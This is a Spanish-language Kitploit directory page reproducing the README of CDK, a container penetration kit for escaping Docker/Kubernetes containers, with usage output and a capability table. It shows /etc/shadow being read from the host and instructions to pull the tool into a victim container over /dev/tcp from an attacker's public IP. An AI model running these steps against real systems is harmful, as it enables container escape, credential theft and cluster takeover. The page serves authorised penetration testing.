Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/cdk-team/cdk
Escalada de PrivilegiosReconocimientoSeguridad de ContenedoresMecanismos de PersistenciaExplotaciónMovimiento LateralPost-ExplotaciónPruebas de PenetraciónSeguridad en la NubeEscape de ContenedoresTop en Escape de Contenedores #2
4.7k60665hace 5 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubcdk-team/cdk

CDK

📦 Facilita las pruebas de seguridad de K8s, Docker y Containerd.

Ver RepositorioSitio web

CDK - Kit de Penetración de Contenedores Sin Dependencias

Inglés | 简体中文

png

Aviso Legal

El uso de CDK para atacar objetivos sin consentimiento mutuo previo es ilegal. CDK es solo para fines de pruebas de seguridad.

Resumen

CDK es un kit de penetración de contenedores de código abierto, diseñado para ofrecer una explotación estable en diferentes contenedores reducidos sin ninguna dependencia del sistema operativo. Viene con útiles herramientas de red y muchos PoCs/EXPs potentes y te ayuda a escapar del contenedor y tomar el control del clúster K8s fácilmente.

Inicio Rápido

Ejecuta cdk eva para obtener información de evaluación y un exploit recomendado, luego ejecuta cdk run para iniciar el ataque.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Instalación/Entrega

Descarga la última versión en https://github.com/cdk-team/CDK/releases/

Coloca los archivos ejecutables en el contenedor objetivo y comienza las pruebas.

CONSEJOS: Entregar CDK en el contenedor objetivo en pruebas de penetración reales

Si tienes un exploit que puede subir un archivo, entonces puedes subir el binario de CDK directamente.

Si tienes un exploit RCE, pero el contenedor objetivo no tiene curl ni wget, puedes usar el siguiente método para entregar CDK:

  1. Primero, aloja el binario de CDK en tu máquina con IP pública.
(en tu máquina)
nc -lvp 999 < cdk
  1. Dentro del contenedor víctima ejecuta
cat < /dev/tcp/(tu_ip_pública)/(puerto) > cdk
chmod a+x cdk

Uso

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

Características

CDK tiene tres módulos:

  1. Evaluate: recopila información dentro del contenedor para encontrar posibles debilidades.
  2. Exploit: para escape de contenedores, persistencia y movimiento lateral.
  3. Tool: herramientas de red y APIs para solicitudes TCP/HTTP, túneles y gestión de clústeres K8s.

Módulo Evaluate

Uso

cdk evaluate [--full]
TácticasScriptSoportadoUso/Ejemplo
Recopilación de InformaciónOS Basic Info✔link
Recopilación de InformaciónAvailable Capabilities✔link
Recopilación de InformaciónAvailable Linux Commands✔link
Recopilación de InformaciónMounts✔link
Recopilación de InformaciónNet Namespace✔link
Recopilación de InformaciónSensitive ENV✔link
Recopilación de InformaciónSensitive Process✔link
Recopilación de InformaciónSensitive Local Files✔link
Recopilación de InformaciónKube-proxy Route Localnet(CVE-2020-8558)✔link
Recopilación de InformaciónDNS-Based Service Discovery✔link
DescubrimientoK8s Api-server Info✔link
DescubrimientoK8s Service-account Info✔link
DescubrimientoCloud Provider Metadata API✔link

Módulo Exploit

Lista todos los exploits disponibles:

cdk run --list

Ejecuta exploit dirigido:

cdk run <script-name> [options]
Descargar herramienta